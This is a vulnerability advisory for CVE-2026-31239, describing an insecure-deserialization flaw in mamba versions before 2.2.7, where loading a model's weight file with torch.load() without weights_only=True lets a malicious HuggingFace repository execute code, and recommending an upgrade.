CVE-2026-31239

Name of the Vulnerable Software and Affected Versions mamba versions prior to 2.2.7

Description Insecure deserialization occurs when loading pre-trained models from HuggingFace Hub. The MambaLMHeadModel.from pretrained() function uses torch.load() to load the pytorch model.bin weight file without enabling the weights only=True parameter. This allows the deserialization of arbitrary Python objects via the pickle module, which is a process of converting a byte stream back into an object. An attacker can publish a malicious model repository on HuggingFace Hub to execute arbitrary code on a victim's system within the context of the mamba process when the model is loaded.

Recommendations Update to version 2.2.7 or later.